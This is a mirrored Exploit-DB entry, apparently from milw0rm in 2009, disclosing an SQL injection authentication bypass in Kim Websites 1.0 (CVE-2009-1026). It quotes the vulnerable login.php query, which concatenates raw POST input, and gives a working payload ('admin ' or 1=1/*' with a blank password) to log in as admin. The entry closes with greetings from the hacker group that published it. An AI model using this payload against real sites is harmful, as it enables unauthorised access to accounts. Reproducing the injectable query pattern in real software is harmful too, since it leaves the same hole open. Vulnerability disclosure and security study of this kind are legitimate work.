- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8209
- Проверка EDB
-
- Пройдено
- Автор
- VIRANGAR SECURITY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1026
- Дата публикации
- 2009-03-13
Код:
###############################################################
# #
# Kim Websites 1.0 SQL Injection Vulnerability #
# [ Authentication bypass] #
###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
-----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz
# milw0rm.com [2009-03-13]- Источник
- www.exploit-db.com
